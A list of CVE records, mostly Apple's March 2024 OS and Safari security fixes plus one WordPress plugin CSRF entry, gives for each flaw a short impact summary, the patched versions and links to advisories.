CVE    2024    23278    Candidate    The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.6.5, macOS Sonoma 14.4, iOS 17.4 and iPadOS 17.4, watchOS 10.4, iOS 16.7.6 and iPadOS 16.7.6, tvOS 17.4. An app may be able to break out of its sandbox.    CONFIRM:https://support.apple.com/kb/HT214085   |   FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5   |   URL:http://seclists.org/fulldisclosure/2024/Mar/22   |   FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/24   |   FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/25   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214082   |   URL:https://support.apple.com/en-us/HT214082   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214085   |   URL:https://support.apple.com/en-us/HT214085   |   MISC:https://support.apple.com/en-us/HT214086   |   URL:https://support.apple.com/en-us/HT214086   |   MISC:https://support.apple.com/en-us/HT214088   |   URL:https://support.apple.com/en-us/HT214088    Assigned (20240112)
CVE    2024    23277    Candidate    The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.4, iOS 17.4 and iPadOS 17.4. An attacker in a privileged network position may be able to inject keystrokes by spoofing a keyboard.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084    Assigned (20240112)
CVE    2024    23276    Candidate    A logic issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. An app may be able to elevate privileges.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5   |   URL:http://seclists.org/fulldisclosure/2024/Mar/22   |   FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/23   |   MISC:https://support.apple.com/en-us/HT214083   |   URL:https://support.apple.com/en-us/HT214083   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214085   |   URL:https://support.apple.com/en-us/HT214085    Assigned (20240112)
CVE    2024    23275    Candidate    A race condition was addressed with additional validation. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. An app may be able to access protected user data.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5   |   URL:http://seclists.org/fulldisclosure/2024/Mar/22   |   FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/23   |   MISC:https://support.apple.com/en-us/HT214083   |   URL:https://support.apple.com/en-us/HT214083   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214085   |   URL:https://support.apple.com/en-us/HT214085    Assigned (20240112)
CVE    2024    23274    Candidate    An injection issue was addressed with improved input validation. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. An app may be able to elevate privileges.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5   |   URL:http://seclists.org/fulldisclosure/2024/Mar/22   |   FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/23   |   MISC:https://support.apple.com/en-us/HT214083   |   URL:https://support.apple.com/en-us/HT214083   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214085   |   URL:https://support.apple.com/en-us/HT214085    Assigned (20240112)
CVE    2024    23273    Candidate    This issue was addressed through improved state management. This issue is fixed in Safari 17.4, iOS 17.4 and iPadOS 17.4, macOS Sonoma 14.4. Private Browsing tabs may be accessed without authentication.    FULLDISC:20240313 APPLE-SA-03-07-2024-1 Safari 17.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/20   |   FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214089   |   URL:https://support.apple.com/en-us/HT214089    Assigned (20240112)
CVE    2024    23272    Candidate    A logic issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. A user may gain access to protected parts of the file system.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5   |   URL:http://seclists.org/fulldisclosure/2024/Mar/22   |   FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/23   |   MISC:https://support.apple.com/en-us/HT214083   |   URL:https://support.apple.com/en-us/HT214083   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214085   |   URL:https://support.apple.com/en-us/HT214085    Assigned (20240112)
CVE    2024    23270    Candidate    The issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.7.4, macOS Ventura 13.6.5, macOS Sonoma 14.4, iOS 17.4 and iPadOS 17.4, tvOS 17.4. An app may be able to execute arbitrary code with kernel privileges.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5   |   URL:http://seclists.org/fulldisclosure/2024/Mar/22   |   FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/23   |   FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/25   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214083   |   URL:https://support.apple.com/en-us/HT214083   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214085   |   URL:https://support.apple.com/en-us/HT214085   |   MISC:https://support.apple.com/en-us/HT214086   |   URL:https://support.apple.com/en-us/HT214086    Assigned (20240112)
CVE    2024    23269    Candidate    A downgrade issue affecting Intel-based Mac computers was addressed with additional code-signing restrictions. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. An app may be able to modify protected parts of the file system.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5   |   URL:http://seclists.org/fulldisclosure/2024/Mar/22   |   FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/23   |   MISC:https://support.apple.com/en-us/HT214083   |   URL:https://support.apple.com/en-us/HT214083   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214085   |   URL:https://support.apple.com/en-us/HT214085    Assigned (20240112)
CVE    2024    23267    Candidate    The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. An app may be able to bypass certain Privacy preferences.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5   |   URL:http://seclists.org/fulldisclosure/2024/Mar/22   |   FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/23   |   MISC:https://support.apple.com/en-us/HT214083   |   URL:https://support.apple.com/en-us/HT214083   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214085   |   URL:https://support.apple.com/en-us/HT214085    Assigned (20240112)
CVE    2024    23266    Candidate    The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. An app may be able to modify protected parts of the file system.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5   |   URL:http://seclists.org/fulldisclosure/2024/Mar/22   |   FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/23   |   MISC:https://support.apple.com/en-us/HT214083   |   URL:https://support.apple.com/en-us/HT214083   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214085   |   URL:https://support.apple.com/en-us/HT214085    Assigned (20240112)
CVE    2024    23265    Candidate    A memory corruption vulnerability was addressed with improved locking. This issue is fixed in macOS Monterey 12.7.4, macOS Ventura 13.6.5, macOS Sonoma 14.4, visionOS 1.1, iOS 17.4 and iPadOS 17.4, watchOS 10.4, iOS 16.7.6 and iPadOS 16.7.6, tvOS 17.4. An app may be able to cause unexpected system termination or write kernel memory.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5   |   URL:http://seclists.org/fulldisclosure/2024/Mar/22   |   FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/23   |   FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/24   |   FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/25   |   FULLDISC:20240313 APPLE-SA-03-07-2024-7 visionOS 1.1   |   URL:http://seclists.org/fulldisclosure/2024/Mar/26   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214082   |   URL:https://support.apple.com/en-us/HT214082   |   MISC:https://support.apple.com/en-us/HT214083   |   URL:https://support.apple.com/en-us/HT214083   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214085   |   URL:https://support.apple.com/en-us/HT214085   |   MISC:https://support.apple.com/en-us/HT214086   |   URL:https://support.apple.com/en-us/HT214086   |   MISC:https://support.apple.com/en-us/HT214087   |   URL:https://support.apple.com/en-us/HT214087   |   MISC:https://support.apple.com/en-us/HT214088   |   URL:https://support.apple.com/en-us/HT214088    Assigned (20240112)
CVE    2024    23264    Candidate    A validation issue was addressed with improved input sanitization. This issue is fixed in macOS Monterey 12.7.4, macOS Ventura 13.6.5, macOS Sonoma 14.4, visionOS 1.1, iOS 17.4 and iPadOS 17.4, iOS 16.7.6 and iPadOS 16.7.6, tvOS 17.4. An application may be able to read restricted memory.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5   |   URL:http://seclists.org/fulldisclosure/2024/Mar/22   |   FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/23   |   FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/25   |   FULLDISC:20240313 APPLE-SA-03-07-2024-7 visionOS 1.1   |   URL:http://seclists.org/fulldisclosure/2024/Mar/26   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214082   |   URL:https://support.apple.com/en-us/HT214082   |   MISC:https://support.apple.com/en-us/HT214083   |   URL:https://support.apple.com/en-us/HT214083   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214085   |   URL:https://support.apple.com/en-us/HT214085   |   MISC:https://support.apple.com/en-us/HT214086   |   URL:https://support.apple.com/en-us/HT214086   |   MISC:https://support.apple.com/en-us/HT214087   |   URL:https://support.apple.com/en-us/HT214087    Assigned (20240112)
CVE    2024    23263    Candidate    A logic issue was addressed with improved validation. This issue is fixed in tvOS 17.4, macOS Sonoma 14.4, visionOS 1.1, iOS 17.4 and iPadOS 17.4, watchOS 10.4, iOS 16.7.6 and iPadOS 16.7.6, Safari 17.4. Processing maliciously crafted web content may prevent Content Security Policy from being enforced.    FEDORA:FEDORA-2024-7ee03010c5   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AO4BNNL5X2LQBJ6WX7VT4SGMA6R7DUU5/   |   FEDORA:FEDORA-2024-ee43b83290   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BAIPBVDQV3GHMSNSZNEJCRZEPM7BEYGF/   |   FULLDISC:20240313 APPLE-SA-03-07-2024-1 Safari 17.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/20   |   FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/24   |   FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/25   |   FULLDISC:20240313 APPLE-SA-03-07-2024-7 visionOS 1.1   |   URL:http://seclists.org/fulldisclosure/2024/Mar/26   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214082   |   URL:https://support.apple.com/en-us/HT214082   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214086   |   URL:https://support.apple.com/en-us/HT214086   |   MISC:https://support.apple.com/en-us/HT214087   |   URL:https://support.apple.com/en-us/HT214087   |   MISC:https://support.apple.com/en-us/HT214088   |   URL:https://support.apple.com/en-us/HT214088   |   MISC:https://support.apple.com/en-us/HT214089   |   URL:https://support.apple.com/en-us/HT214089    Assigned (20240112)
CVE    2024    23262    Candidate    This issue was addressed with additional entitlement checks. This issue is fixed in visionOS 1.1, iOS 17.4 and iPadOS 17.4, iOS 16.7.6 and iPadOS 16.7.6. An app may be able to spoof system notifications and UI.    FULLDISC:20240313 APPLE-SA-03-07-2024-7 visionOS 1.1   |   URL:http://seclists.org/fulldisclosure/2024/Mar/26   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214082   |   URL:https://support.apple.com/en-us/HT214082   |   MISC:https://support.apple.com/en-us/HT214087   |   URL:https://support.apple.com/en-us/HT214087    Assigned (20240112)
CVE    2024    23260    Candidate    This issue was addressed by removing additional entitlements. This issue is fixed in macOS Sonoma 14.4. An app may be able to access user-sensitive data.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084    Assigned (20240112)
CVE    2024    2326    Candidate    The Pretty Links – Affiliate Links, Link Branding, Link Tracking & Marketing Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.6.3. This is due to missing or incorrect nonce validation when saving plugin settings. This makes it possible for unauthenticated attackers to change the plugin's configuration including stripe integration via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3049386%40pretty-link&new=3049386%40pretty-link&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3049386%40pretty-link&new=3049386%40pretty-link&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/97d78b4b-568e-43e7-bebf-091179c321f6?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/97d78b4b-568e-43e7-bebf-091179c321f6?source=cve    Assigned (20240308)
CVE    2024    23259    Candidate    The issue was addressed with improved checks. This issue is fixed in iOS 16.7.6 and iPadOS 16.7.6, iOS 17.4 and iPadOS 17.4, macOS Sonoma 14.4. Processing web content may lead to a denial-of-service.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214082   |   URL:https://support.apple.com/en-us/HT214082   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084    Assigned (20240112)
CVE    2024    23258    Candidate    An out-of-bounds read was addressed with improved input validation. This issue is fixed in visionOS 1.1, macOS Sonoma 14.4. Processing an image may lead to arbitrary code execution.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-7 visionOS 1.1   |   URL:http://seclists.org/fulldisclosure/2024/Mar/26   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214087   |   URL:https://support.apple.com/en-us/HT214087    Assigned (20240112)
CVE    2024    23257    Candidate    The issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.7.4, macOS Ventura 13.6.5, macOS Sonoma 14.4, visionOS 1.1, iOS 16.7.6 and iPadOS 16.7.6. Processing an image may result in disclosure of process memory.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5   |   URL:http://seclists.org/fulldisclosure/2024/Mar/22   |   FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/23   |   FULLDISC:20240313 APPLE-SA-03-07-2024-7 visionOS 1.1   |   URL:http://seclists.org/fulldisclosure/2024/Mar/26   |   MISC:https://support.apple.com/en-us/HT214082   |   URL:https://support.apple.com/en-us/HT214082   |   MISC:https://support.apple.com/en-us/HT214083   |   URL:https://support.apple.com/en-us/HT214083   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214085   |   URL:https://support.apple.com/en-us/HT214085   |   MISC:https://support.apple.com/en-us/HT214087   |   URL:https://support.apple.com/en-us/HT214087    Assigned (20240112)
CVE    2024    23256    Candidate    A logic issue was addressed with improved state management. This issue is fixed in iOS 17.4 and iPadOS 17.4. A user's locked tabs may be briefly visible while switching tab groups when Locked Private Browsing is enabled.    FULLDISC:20240313 APPLE-SA-03-05-2024-1 iOS 17.4 and iPadOS 17.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/18   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081    Assigned (20240112)
CVE    2024    23255    Candidate    An authentication issue was addressed with improved state management. This issue is fixed in macOS Sonoma 14.4, iOS 17.4 and iPadOS 17.4. Photos in the Hidden Photos Album may be viewed without authentication.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084    Assigned (20240112)
CVE    2024    23254    Candidate    The issue was addressed with improved UI handling. This issue is fixed in tvOS 17.4, macOS Sonoma 14.4, visionOS 1.1, iOS 17.4 and iPadOS 17.4, watchOS 10.4, Safari 17.4. A malicious website may exfiltrate audio data cross-origin.    FULLDISC:20240313 APPLE-SA-03-07-2024-1 Safari 17.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/20   |   FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/24   |   FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/25   |   FULLDISC:20240313 APPLE-SA-03-07-2024-7 visionOS 1.1   |   URL:http://seclists.org/fulldisclosure/2024/Mar/26   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214086   |   URL:https://support.apple.com/en-us/HT214086   |   MISC:https://support.apple.com/en-us/HT214087   |   URL:https://support.apple.com/en-us/HT214087   |   MISC:https://support.apple.com/en-us/HT214088   |   URL:https://support.apple.com/en-us/HT214088   |   MISC:https://support.apple.com/en-us/HT214089   |   URL:https://support.apple.com/en-us/HT214089    Assigned (20240112)
CVE    2024    23253    Candidate    A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sonoma 14.4. An app may be able to access a user's Photos Library.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084    Assigned (20240112)
CVE    2024    23252    Candidate    The issue was addressed with improved memory handling. This issue is fixed in Safari 17.4, iOS 17.4 and iPadOS 17.4, macOS Sonoma 14.4. Processing web content may lead to a denial-of-service.    FULLDISC:20240313 APPLE-SA-03-07-2024-1 Safari 17.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/20   |   FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214089   |   URL:https://support.apple.com/en-us/HT214089    Assigned (20240112)
CVE    2024    23250    Candidate    An access issue was addressed with improved access restrictions. This issue is fixed in tvOS 17.4, iOS 17.4 and iPadOS 17.4, macOS Sonoma 14.4, watchOS 10.4. An app may be able to access Bluetooth-connected microphones without user permission.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/24   |   FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/25   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214086   |   URL:https://support.apple.com/en-us/HT214086   |   MISC:https://support.apple.com/en-us/HT214088   |   URL:https://support.apple.com/en-us/HT214088    Assigned (20240112)
CVE    2024    23249    Candidate    The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.4. Processing a file may lead to a denial-of-service or potentially disclose memory contents.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084    Assigned (20240112)
CVE    2024    23247    Candidate    The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. Processing a file may lead to unexpected app termination or arbitrary code execution.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5   |   URL:http://seclists.org/fulldisclosure/2024/Mar/22   |   FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/23   |   MISC:https://support.apple.com/en-us/HT214083   |   URL:https://support.apple.com/en-us/HT214083   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214085   |   URL:https://support.apple.com/en-us/HT214085    Assigned (20240112)
CVE    2024    23246    Candidate    This issue was addressed by removing the vulnerable code. This issue is fixed in macOS Sonoma 14.4, visionOS 1.1, iOS 17.4 and iPadOS 17.4, watchOS 10.4, iOS 16.7.6 and iPadOS 16.7.6, tvOS 17.4. An app may be able to break out of its sandbox.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/24   |   FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/25   |   FULLDISC:20240313 APPLE-SA-03-07-2024-7 visionOS 1.1   |   URL:http://seclists.org/fulldisclosure/2024/Mar/26   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214082   |   URL:https://support.apple.com/en-us/HT214082   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214086   |   URL:https://support.apple.com/en-us/HT214086   |   MISC:https://support.apple.com/en-us/HT214087   |   URL:https://support.apple.com/en-us/HT214087   |   MISC:https://support.apple.com/en-us/HT214088   |   URL:https://support.apple.com/en-us/HT214088    Assigned (20240112)
CVE    2024    23245    Candidate    This issue was addressed by adding an additional prompt for user consent. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. Third-party shortcuts may use a legacy action from Automator to send events to apps without user consent.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5   |   URL:http://seclists.org/fulldisclosure/2024/Mar/22   |   FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/23   |   MISC:https://support.apple.com/en-us/HT214083   |   URL:https://support.apple.com/en-us/HT214083   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214085   |   URL:https://support.apple.com/en-us/HT214085    Assigned (20240112)
